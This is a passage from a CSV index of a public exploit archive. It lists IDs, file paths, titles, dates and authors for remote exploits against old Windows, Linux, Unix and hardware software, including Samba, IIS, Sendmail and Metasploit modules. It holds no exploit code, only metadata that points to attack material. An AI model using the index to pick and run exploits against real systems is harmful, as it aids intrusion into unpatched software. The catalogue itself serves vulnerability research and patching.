Buffer Overrun (2)",2003-02-23,CrZ,remote,linux, +22275,exploits/linux/remote/22275.pl,"Webmin 0.9x / Usermin 0.9x/1.0 - Unauthenticated Access Session ID Spoofing",2003-02-20,"Carl Livitt",remote,linux, +22278,exploits/linux/remote/22278.pl,"moxftp 2.2 - Banner Parsing Buffer Overflow",2003-02-24,"Knud Erik Hojgaard",remote,linux, +22280,exploits/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution",2003-02-24,http-equiv,remote,windows, +22288,exploits/windows/remote/22288.txt,"Microsoft Internet Explorer 5/6 - Self Executing HTML File",2003-02-25,http-equiv,remote,windows, +22289,exploits/windows/remote/22289.c,"Microsoft Windows XP/ME - Help and Support Center Buffer Overflow",2003-02-26,s0h,remote,windows, +22291,exploits/linux/remote/22291.c,"AMX Mod 0.9.2 - Remote 'amx_say' Format String",2003-02-26,greuff,remote,linux, +22292,exploits/unix/remote/22292.pl,"Frisk F-Prot AntiVirus 3.12b - Command Line Scanner Buffer Overflow",2003-02-26,"Knud Erik Hojgaard",remote,unix, +22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",remote,multiple, +22301,exploits/windows/remote/22301.html,"Aladdin Knowledge System Ltd - 'PrivAgent.ocx' ChooseFilePath Buffer Overflow",2012-10-28,b33f,remote,windows, +22304,exploits/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)",2012-10-28,Metasploit,remote,multiple, +22305,exploits/windows/remote/22305.rb,"HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)",2012-10-29,Metasploit,remote,windows, +22306,exploits/windows/remote/22306.rb,"HP Operations Agent - Opcode 'coda.exe' 0x34 Buffer Overflow (Metasploit)",2012-10-29,Metasploit,remote,windows, +22311,exploits/cgi/remote/22311.txt,"Axis Communications Video Server 2.x - 'Command.cgi' File Creation",2003-02-28,"Martin Eiszner",remote,cgi, +22312,exploits/cgi/remote/22312.txt,"Apple QuickTime/Darwin Streaming Server 4.1.x - 'parse_xml.cgi' File Disclosure",2003-02-28,"Joe Testa",remote,cgi, +22313,exploits/unix/remote/22313.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (1)",2003-03-02,"Last Stage of Delirium",remote,unix, +22314,exploits/unix/remote/22314.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (2)",2003-03-02,bysin,remote,unix, +22319,exploits/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",remote,hardware, +22327,exploits/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,remote,multiple, +22338,exploits/windows/remote/22338.txt,"Clearswift MAILsweeper 4.x - MIME Attachment Filter Bypass",2003-03-07,http-equiv,remote,windows, +22341,exploits/windows/remote/22341.txt,"Opera 6.0/7.0 - 'Filename Download' Buffer Overrun",2003-03-10,nesumin,remote,windows, +22342,exploits/linux/remote/22342.c,"Qpopper 4.0.x - Remote Memory Corruption",2003-03-10,"Florian Heinz",remote,linux, +22346,exploits/linux/remote/22346.c,"PGP4Pine 1.75.6/1.76 - 'Message Line' Remote Buffer Overflow",2003-03-12,"Eric AUGE",remote,linux, +22350,exploits/hardware/remote/22350.txt,"Nokia SGSN DX200 - Remote SNMP Information Disclosure",2003-03-13,"Ollie Whitehouse",remote,hardware, +22351,exploits/windows/remote/22351.py,"Freefloat FTP Server - 'PUT' Remote Buffer Overflow",2012-10-30,"Jacob Holcomb",remote,windows, +22353,exploits/linux/remote/22353.c,"BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption",2003-03-06,eSDee,remote,linux, +22355,exploits/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,remote,cgi, +22356,exploits/unix/remote/22356.c,"Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,remote,unix, +22361,exploits/linux/remote/22361.cpp,"Qpopper 3/4 - 'Username' Information Disclosure",2003-03-11,plasmahh,remote,linux, +22365,exploits/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1)",2003-03-24,mat,remote,windows, +22366,exploits/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2)",2003-03-31,ThreaT,remote,windows, +22367,exploits/windows/remote/22367.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3)",2003-04-04,"Morning Wood",remote,windows, +22368,exploits/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,remote,windows, +22369,exploits/linux/remote/22369.txt,"Ximian Evolution 1.x - UUEncoding Parsing Memory Corruption",2003-03-17,"Core Security",remote,linux, +22371,exploits/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion",2003-03-19,"Core Security",remote,linux, +22375,exploits/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - 'ChooseFilePath' Remote Buffer Overflow (Metasploit)",2012-11-01,Metasploit,remote,windows, +22379,exploits/linux/remote/22379.c,"PXE Server 2.0 - Remote Buffer Overrun",2003-03-13,CrZ,remote,linux, +22381,exploits/multiple/remote/22381.txt,"SIPS 0.2.2 - User Information Disclosure",2003-03-18,dwcgr0up,remote,multiple, +22388,exploits/multiple/remote/22388.txt,"WFChat 1.0 - Information Disclosure",2003-03-19,subj,remote,multiple, +22394,exploits/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon - Unfiltered Escape Sequence",2003-03-21,"Dr. Peter Bieringer",remote,hardware, +22409,exploits/multiple/remote/22409.txt,"Simple Chat 1.x - User Information Disclosure",2003-03-21,subj,remote,multiple, +22410,exploits/multiple/remote/22410.pl,"ProtWare HTML Guardian 6.x - Encryption",2003-03-21,rain_song,remote,multiple, +22416,exploits/hardware/remote/22416.txt,"3Com SuperStack II RAS 1500 - Unauthorized Access",2003-03-24,"Piotr Chytla",remote,hardware, +22418,exploits/windows/remote/22418.c,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (2)",2003-04-30,ThreaT,remote,windows, +22432,exploits/windows/remote/22432.rb,"HP Intelligent Management Center UAM - Remote Buffer Overflow (Metasploit)",2012-11-04,Metasploit,remote,windows, +22434,exploits/windows/remote/22434.txt,"Sambar Server 5.x - Information Disclosure",2003-03-27,"gregory Le Bras",remote,windows, +22448,exploits/windows/remote/22448.txt,"BEA WebLogic 7.0 - Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",remote,windows, +22449,exploits/unix/remote/22449.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (1)",2003-04-02,Xpl017Elz,remote,unix, +22450,exploits/unix/remote/22450.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (2)",2003-04-02,Xpl017Elz,remote,unix, +22453,exploits/hardware/remote/22453.txt,"NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,remote,hardware, +22454,exploits/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",remote,linux, +22455,exploits/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,remote,hardware, +22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple, +22466,exploits/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Remote Stack Overflow ROP-Based (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",remote,windows, +22468,exploits/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,remote,unix, +22469,exploits/unix/remote/22469.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)",2003-04-07,c0wboy,remote,unix, +22470,exploits/unix/remote/22470.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)",2003-05-12,eDSee,remote,unix, +22471,exploits/unix/remote/22471.txt,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)",2003-04-07,noir,remote,unix, +22472,exploits/multiple/remote/22472.txt,"Vignette StoryServer 4.1 - Sensitive Stack Memory Information Disclosure",2003-04-07,@stake,remote,multiple, +22475,exploits/unix/remote/22475.txt,"Amavis 0.1.6 - Header Parsing Mail Relaying",2003-04-08,"Phil Cyc",remote,unix, +22476,exploits/windows/remote/22476.txt,"QuickFront 1.0 - File Disclosure",2003-04-09,"Jan Kachlik",remote,windows, +22479,exploits/linux/remote/22479.c,"PoPToP PPTP 1.0/1.1.x - Negative 'read()' Argument Remote Buffer Overflow",2003-04-09,"John Leach",remote,linux, +22480,exploits/hardware/remote/22480.txt,"Linksys BEFVP4 - SNMP Community String Information Disclosure",2003-04-09,"Branson Matheson",remote,hardware, +22485,exploits/linux/remote/22485.c,"SheerDNS 1.0 - Information Disclosure",2003-04-14,"Jedi/Sector One",remote,linux, +22488,exploits/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 - site.ini Information Disclosure",2003-04-15,"gregory Le Bras",remote,windows, +22496,exploits/multiple/remote/22496.txt,"Python 2.2/2.3 - Documentation Server Error Page Cross-Site Scripting",2003-04-15,euronymous,remote,multiple, +22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple, +22504,exploits/windows/remote/22504.txt,"Cerberus FTP Server 2.1 - Information Disclosure",2003-04-16,"Ziv Kamir",remote,windows, +22506,exploits/windows/remote/22506.txt,"EZ Server 1.0 - File Disclosure",2003-04-17,"gregory Le Bras",remote,windows, +22509,exploits/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",remote,multiple, +22511,exploits/windows/remote/22511.txt,"Working Resources 1.7.x/2.15 BadBlue - 'ext.dll' Command Execution",2003-04-20,"Matthew Murphy",remote,windows, +22515,exploits/windows/remote/22515.txt,"AN HTTPD 1.x - Count.pl Directory Traversal",2003-04-22,"Matthew Murphy",remote,windows, +22522,exploits/multiple/remote/22522.pl,"Web Protector 2.0 - Trivial Encryption",2003-04-22,rjfix,remote,multiple, +22570,exploits/windows/remote/22570.java,"Microsoft Windows Media Player 7.1 - Skin File Code Execution",2003-05-07,"Jelmer Kuperus",remote,windows, +22525,exploits/windows/remote/22525.rb,"EMC NetWorker - Format String (Metasploit)",2012-11-07,Metasploit,remote,windows, +22526,exploits/windows/remote/22526.rb,"WinRM - VBS Remote Code Execution (Metasploit)",2012-11-07,Metasploit,remote,windows, +22530,exploits/windows/remote/22530.pl,"Microsoft Internet Explorer 5 - Remote 'URLMON.dll' Remote Buffer Overflow",2003-04-23,"Jouko Pynnonen",remote,windows, +22532,exploits/hardware/remote/22532.txt,"IKE - Aggressive Mode Shared Secret Hash Leakage",1999-10-02,"John Pliam",remote,hardware, +22533,exploits/hardware/remote/22533.txt,"Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading",2003-04-24,"Jonas Eriksson",remote,hardware, +22541,exploits/cgi/remote/22541.txt,"Alt-N WebAdmin 2.0.x - Remote File Viewing",2003-04-25,david@kamborio.net,remote,cgi, +22542,exploits/cgi/remote/22542.txt,"Alt-N WebAdmin 2.0.x - Remote File Disclosure",2003-04-25,david@kamborio.net,remote,cgi, +22546,exploits/windows/remote/22546.txt,"Opera 7.0/7.10 - JavaScript Console Single Quote Attribute Injection",2003-04-28,nesumin,remote,windows, +22556,exploits/windows/remote/22556.c,"MDG Web Server 4D 3.6 - HTTP Command Buffer Overflow",2003-04-29,badpack3t,remote,windows, +22562,exploits/windows/remote/22562.pl,"Microsoft IIS 5.0 - User Existence Disclosure (1)",1999-02-24,JeiAr,remote,windows, +22563,exploits/windows/remote/22563.pl,"Microsoft IIS 5.0 - User Existence Disclosure (2)",1999-02-24,JeiAr,remote,windows, +22575,exploits/windows/remote/22575.txt,"Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass",2003-05-09,"Marek Bialoglowy",remote,windows, +22584,exploits/linux/remote/22584.txt,"Info-ZIP UnZip 5.50 - Encoded Character Hostile Destination Path",2003-05-10,Jelmer,remote,linux, +22593,exploits/windows/remote/22593.html,"Yahoo! Voice Chat ActiveX Control 1.0.0.43 - Remote Buffer Overflow",2003-05-12,cesaro,remote,windows, +22601,exploits/linux/remote/22601.txt,"Inktomi Traffic Server 4.0/5.x - Cross-Site Scripting",2003-05-14,"Hugo Vazquez",remote,linux, +22604,exploits/windows/remote/22604.txt,"ArGoSoft 1.8.x - Authentication Bypass",2003-05-15,"Ziv Kamir",remote,windows, +22609,exploits/windows/remote/22609.txt,"Snowblind 1.0/1.1 - Web Server File Disclosure",2003-05-16,euronymous,remote,windows, +22611,exploits/multiple/remote/22611.txt,"Netscape Enterprise Server 3.x/4.x - PageServices Information Disclosure",1998-08-16,anonymous,remote,multiple, +22620,exploits/windows/remote/22620.txt,"Working Resources BadBlue 1.7.x/2.x - Unauthorized HTS Access",2003-05-20,mattmurphy,remote,windows, +22622,exploits/linux/remote/22622.txt,"WSMP3 0.0.x - Remote Information Disclosure",2003-05-21,"dong-h0un U",remote,linux, +22623,exploits/linux/remote/22623.txt,"WSMP3 0.0.x - Remote Command Execution",2003-05-21,"dong-h0un U",remote,linux, +22626,exploits/hardware/remote/22626.txt,"Axis Network Camera 2.x - HTTP Authentication Bypass",2003-05-27,"Juliano Rizzo",remote,hardware, +22627,exploits/windows/remote/22627.pl,"Qualcomm Eudora 5.2.1/6.0 - File Attachment Spoofing Variant",2003-05-22,"Paul Szabo",remote,windows, +22630,exploits/osx/remote/22630.txt,"Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling",2003-05-22,"Sir Mordred",remote,osx, +22631,exploits/windows/remote/22631.txt,"IISProtect 2.1/2.2 - Authentication Bypass",2003-05-22,iDefense,remote,windows, +22635,exploits/windows/remote/22635.c,"Magic Winmail Server 2.3 USER POP3 - Command Format String",2003-05-23,D4rkGr3y,remote,windows, +22636,exploits/windows/remote/22636.txt,"EServ 2.9x - Directory Indexing",2003-05-23,D4rkGr3y,remote,windows, +22646,exploits/unix/remote/22646.txt,"Vignette 4.x/5.0 - Memory Disclosure",2003-05-26,S21Sec,remote,unix, +22648,exploits/unix/remote/22648.txt,"Vignette 4/5 - Cross-Site Scripting",2003-05-26,"Ramon Pinuaga Cascales",remote,unix, +22649,exploits/multiple/remote/22649.txt,"P-News 1.16 - Administrative Account Creation",2003-05-24,"Peter Winter-Smith",remote,multiple, +22657,exploits/multiple/remote/22657.rb,"Java Applet - JAX-WS Remote Code Execution (Metasploit)",2012-11-13,Metasploit,remote,multiple, +22658,exploits/linux/remote/22658.pl,"Batalla Naval 1.0 4 - Remote Buffer Overflow (1)",2003-05-26,wsxz,remote,linux, +22659,exploits/linux/remote/22659.c,"Batalla Naval 1.0 4 - Remote Buffer Overflow (2)",2003-05-26,jsk,remote,linux, +22662,exploits/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,remote,multiple, +22664,exploits/windows/remote/22664.txt,"Sun ONE Application Server 7.0 - Source Disclosure",2003-05-27,"SPI Labs",remote,windows, +22665,exploits/windows/remote/22665.txt,"Sun ONE Application Server 7.0 - Error Message Cross-Site Scripting",2003-05-27,"SPI Labs",remote,windows, +22674,exploits/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Full Path Disclosure",2003-05-29,JeiAr,remote,windows, +22676,exploits/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe?css' Cross-Site Scripting",2003-05-29,JeiAr,remote,windows, +22677,exploits/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe?css' Cross-Site Scripting",2003-05-29,JeiAr,remote,windows, +22678,exploits/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",remote,windows, +22686,exploits/php/remote/22686.rb,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-11-13,Metasploit,remote,php, +22691,exploits/windows/remote/22691.txt,"pablo software Solutions baby ftp server 1.2 - Directory Traversal",2003-05-29,dr_insane,remote,windows, +22696,exploits/php/remote/22696.txt,"PHP 4.x - Transparent Session ID Cross-Site Scripting",2003-05-30,"Sverre H. Huseby",remote,php, +22699,exploits/unix/remote/22699.c,"Mod_Gzip 1.3.x - Debug Mode",2003-05-06,xCrZx,remote,unix, +22714,exploits/windows/remote/22714.rb,"Oracle Database Client System Analyzer - Arbitrary File Upload (Metasploit)",2012-11-15,Metasploit,remote,windows, +22721,exploits/windows/remote/22721.txt,"Pablo Software Solutions FTP Service 1.2 - Anonymous Users Privileges",2003-06-03,JeiAr,remote,windows, +22722,exploits/windows/remote/22722.txt,"Pablo Software Solutions FTP Service 1.2 - Plaintext Password",2003-06-03,JeiAr,remote,windows, +22723,exploits/windows/remote/22723.txt,"MegaBrowser 0.3 - HTTP Directory Traversal",2003-06-04,JeiAr,remote,windows, +22726,exploits/windows/remote/22726.txt,"Microsoft Internet Explorer 5 - OBJECT Tag Buffer Overflow",2003-06-04,FelineMenace,remote,windows, +22728,exploits/windows/remote/22728.txt,"Microsoft Internet Explorer 5 - Classic Mode FTP Client Cross Domain Scripting",2003-06-04,"Matthew Murphy",remote,windows, +22733,exploits/hp-ux/remote/22733.c,"HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure",2003-06-05,di0aD,remote,hp-ux, +22734,exploits/windows/remote/22734.html,"Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution",2003-06-05,"Eiji James Yoshida",remote,windows, +22737,exploits/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution",2012-11-15,rgod,remote,windows, +22738,exploits/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution",2012-11-15,rgod,remote,windows, +22751,exploits/multiple/remote/22751.txt,"Mozilla 1.x / opera 6/7 - Timed document.write Method Cross Domain Policy",2003-06-07,meme-boi,remote,multiple, +22753,exploits/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (1)",2003-06-10,pokleyzz,remote,cgi, +22754,exploits/cgi/remote/22754.pl,"MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (2)",2003-06-10,inv,remote,cgi, +22755,exploits/multiple/remote/22755.txt,"Aiglon Web Server 2.0 - Installation Path Information Disclosure",2003-06-10,"Ziv Kamir",remote,multiple, +22758,exploits/windows/remote/22758.txt,"silentthought simple Web server 1.0 - Directory Traversal",2003-06-12,"Ziv Kamir",remote,windows, +22769,exploits/windows/remote/22769.txt,"Methodus 3 Web Server - File Disclosure",2003-06-13,"Peter Winter-Smith",remote,windows, +22771,exploits/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6 / Xpdf 0.9x Hyperlinks - Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",remote,linux, +22782,exploits/windows/remote/22782.py,"Microsoft Windows Server 2000 - Active Directory Remote Stack Overflow",2003-07-02,"Core Security",remote,windows, +22783,exploits/windows/remote/22783.txt,"Microsoft Internet Explorer 5/6 - MSXML XML File Parsing Cross-Site Scripting",2003-06-17,"GreyMagic Software",remote,windows, +22784,exploits/windows/remote/22784.txt,"Microsoft Internet Explorer 5 - Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",remote,windows, +22785,exploits/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",remote,windows, +22786,exploits/linux/remote/22786.c,"Dune 0.6.7 - GET Remote Buffer Overrun",2003-06-17,V9,remote,linux, +22787,exploits/windows/remote/22787.rb,"Novell File Reporter (NFR) Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-11-19,Metasploit,remote,windows, +22795,exploits/windows/remote/22795.txt,"MiniHTTPServer Web Forums Server 1.x/2.0 - Directory Traversal",2003-06-18,dr_insane,remote,windows, +22807,exploits/windows/remote/22807.txt,"SurfControl Web Filter 4.2.0.1 - File Disclosure",2003-06-19,"thomas adams",remote,windows, +22824,exploits/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4.0 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",remote,windows, +22827,exploits/windows/remote/22827.txt,"Compaq Web-Based Management Agent - Remote File Verification",2003-06-23,"Ian Vitek",remote,windows, +22830,exploits/linux/remote/22830.c,"LBreakout2 2.x - Login Remote Format String",2003-06-24,V9,remote,linux, +22832,exploits/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,remote,freebsd, +22833,exploits/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (1)",2003-06-24,"Mark Litchfield",remote,windows, +22834,exploits/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (2)",2003-06-24,"Mark Litchfield",remote,windows, +22837,exploits/windows/remote/22837.c,"Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,remote,windows, +22838,exploits/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",remote,windows, +22848,exploits/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,remote,linux, +22854,exploits/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,remote,windows, +22856,exploits/linux/remote/22856.rb,"Narcissus Image Configuration - Passthru (Metasploit)",2012-11-21,Metasploit,remote,linux, +22858,exploits/openbsd/remote/22858.txt,"OpenBSD 3.x - PF RDR Network Information Leakage",2003-07-02,Ed3f,remote,openbsd, +22867,exploits/multiple/remote/22867.pl,"Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure",2003-07-05,rs2112,remote,multiple, +22869,exploits/windows/remote/22869.html,"Microsoft Outlook 5.5/2000 - Web Access HTML Attachment Script Execution",2003-07-05,"Hugo Vazquez",remote,windows, +22871,exploits/windows/remote/22871.c,"IglooFTP PRO 3.8 - Multiple Buffer Overflow Vulnerabilities (1)",2003-07-07,vkhoshain,remote,windows, +22872,exploits/windows/remote/22872.txt,"IglooFTP PRO 3.8 - Multiple Buffer Overflow Vulnerabilities (2)",2003-07-07,"Peter Winter-Smith",remote,windows, +22873,exploits/linux/remote/22873.c,"GKrellM Mailwatch Plugin 2.4.1/2.4.2 - From Header Remote Buffer Overflow",2003-07-06,isox,remote,linux, +23034,exploits/windows/remote/23034.txt,"Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration",2003-08-14,"Andy Davis",remote,windows, +22890,exploits/freebsd/remote/22890.pl,"cftp 0.12 - Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,remote,freebsd, +22891,exploits/freebsd/remote/22891.pl,"IglooFTP 0.6.1 - Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,remote,freebsd, +22892,exploits/windows/remote/22892.txt,"Mabry Software HTTPServer/X 1.0 0.047 - File Disclosure",2003-07-11,dr_insane,remote,windows, +22893,exploits/linux/remote/22893.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - FTP Gateway Buffer Overflow",2003-07-11,V9,remote,linux, +22894,exploits/linux/remote/22894.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - GSisText Buffer Overflow",2003-07-11,V9,remote,linux, +22898,exploits/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,remote,hardware, +22903,exploits/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Perl Remote Code Execution (Metasploit)",2012-11-22,Metasploit,remote,windows, +22905,exploits/windows/remote/22905.rb,"Apple QuickTime 7.7.2 - TeXML Style Element font-table Field Stack Buffer Overflow (Metasploit)",2012-11-24,Metasploit,remote,windows, +22908,exploits/linux/remote/22908.c,"Exceed 5.0/6.0/6.1/7.1/8.0 - Font Name Handler Buffer Overflow",2003-07-15,c0ntex,remote,linux, +22909,exploits/windows/remote/22909.txt,"NetSuite 1.0/1.2 - HTTP Server Directory Traversal",2003-07-15,dr_insane,remote,windows, +22944,exploits/windows/remote/22944.txt,"Savant Web Server 3.1 - CGITest.HTML Cross-Site Scripting",2003-07-21,dr_insane,remote,windows, +22951,exploits/windows/remote/22951.html,"Opera 7.20 - Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",remote,windows, +22959,exploits/windows/remote/22959.txt,"Microsoft Outlook Express 5/6 - Script Execution",2003-07-25,http-equiv,remote,windows, +22964,exploits/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String",2003-07-28,lucipher,remote,unix, +22966,exploits/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow (1)",2003-07-29,D4rkGr3y,remote,windows, +22967,exploits/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow (2)",2003-07-29,anonymous,remote,windows, +22968,exploits/linux/remote/22968.c,"Valve Software Half-Life Server 1.1.1.0/3.1.1.1c1/4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,remote,linux, +22917,exploits/windows/remote/22917.txt,"Microsoft Windows - DCOM RPC Interface Buffer Overrun",2003-08-11,aT4r@3wdesign.es,remote,windows, +22919,exploits/windows/remote/22919.txt,"Microsoft ISA Server 2000 - Cross-Site Scripting",2003-07-16,"Brett Moore",remote,windows, +23006,exploits/php/remote/23006.rb,"Network Shutdown Module 3.21 - 'sort_values' Remote PHP Code Injection (Metasploit)",2012-11-29,Metasploit,remote,php, +22969,exploits/linux/remote/22969.c,"Valve Software Half-Life Server 3.1.1.0 - Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,remote,linux, +22973,exploits/windows/remote/22973.rb,"Apple QuickTime 7.7.2 - MIME Type Buffer Overflow (Metasploit)",2012-11-28,Metasploit,remote,windows, +22974,exploits/unix/remote/22974.c,"WU-FTPD 2.6.2 - 'realpath()' Off-by-One Buffer Overflow",2003-08-02,Xpl017Elz,remote,unix, +22975,exploits/unix/remote/22975.c,"WU-FTPD 2.6.0/2.6.1/2.6.2 - 'realpath()' Off-by-One Buffer Overflow",2003-08-06,Xpl017Elz,remote,unix, +22976,exploits/freebsd/remote/22976.pl,"FreeBSD 4.8 - 'realpath()' Off-by-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,remote,freebsd, +22994,exploits/multiple/remote/22994.txt,"Sun One 5.1 / IPlanet 5.0/5.1 - Administration Server Directory Traversal",2003-08-08,"Jim Hardisty",remote,multiple, +23002,exploits/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 - Null Password Authentication",2003-08-09,"Buckaroo Banzai",remote,windows, +23019,exploits/windows/remote/23019.c,"Microsoft Windows Server 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking",2003-08-11,root@networkpenetration.com,remote,windows, +23024,exploits/multiple/remote/23024.txt,"SurgeLDAP 1.0 d - Full Path Disclosure",2003-08-13,"Ziv Kamir",remote,multiple, +23038,exploits/windows/remote/23038.c,"eMule 0.2x Client - OP_SERVERIDENT Heap Overflow",2003-09-01,"Stefan Esser",remote,windows, +23040,exploits/windows/remote/23040.c,"eMule 0.2x - AttachToAlreadyKnown Double-Free",2003-09-01,"Stefan Esser",remote,windows, +23043,exploits/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 - '.SMIL' File Script Execution",2003-08-19,KrazySnake,remote,windows, +23044,exploits/windows/remote/23044.txt,"Microsoft Internet Explorer 5/6 - Object Type Validation",2003-08-20,"Drew Copley",remote,windows, +23049,exploits/linux/remote/23049.c,"Srcpd 2.0 - Multiple Buffer Overflow Vulnerabilities",2003-08-21,Over_G,remote,linux, +23054,exploits/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Code Execution",2003-08-23,kf,remote,linux, +23066,exploits/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 - 'Filename' Buffer Overrun",2003-08-27,storm,remote,windows, +23068,exploits/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal",2003-08-30,sickle,remote,windows, +23069,exploits/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Information Disclosure",2003-08-30,"Martin Eiszner",remote,multiple, +23070,exploits/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal",2003-08-30,"Martin Eiszner",remote,multiple, +23071,exploits/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",remote,multiple, +23073,exploits/windows/remote/23073.txt,"MySQL 